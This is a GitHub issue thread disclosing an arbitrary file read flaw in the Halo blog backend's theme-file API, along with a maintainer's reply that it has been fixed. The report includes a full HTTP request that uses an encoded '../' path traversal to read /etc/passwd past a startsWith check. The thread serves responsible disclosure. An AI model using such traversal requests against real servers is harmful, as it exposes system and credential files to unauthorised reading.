### ISSUE TITLE
An Arbitrary File reading vulnerability in the backend(bypass the Path check)

### ISSUE THREAD

**Issue by any-how** [halo-dev/halo#420]
**I am sure I have checked** 

- [x] [Halo User Guide Documentation ](https://halo.run/docs)
- [x] [Halo BBS](https://bbs.halo.run)
- [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98)
- [x] [Other Issues](https://github.com/halo-dev/halo/issues)

----
**I want to apply**  
- [x] BUG feedback

In an interface that reads files in the background, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it.
![image](https://user-images.githubusercontent.com/16250867/70615169-dd0b1180-1c46-11ea-8a92-918a7134fee8.png)
So I can read any file using the following message
![image](https://user-images.githubusercontent.com/16250867/70615059-a59c6500-1c46-11ea-9c60-7413c0d60047.png)
```
GET /api/admin/themes/caicai_anatole/files/content?path=%2Froot%2F.halo%2Ftemplates%2Fthemes%2Fanatole%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F/passwd HTTP/1.1
Host: 100.101.61.13:8090
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Referer: http://100.101.61.13:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

```

**Comment by JohnNiang** [comment]
I wrote this function inside incorrectly. And it had been fixed by https://github.com/halo-dev/halo/commit/d59877a9ce82b53ec27c7f012a5703280e2cfd4f.
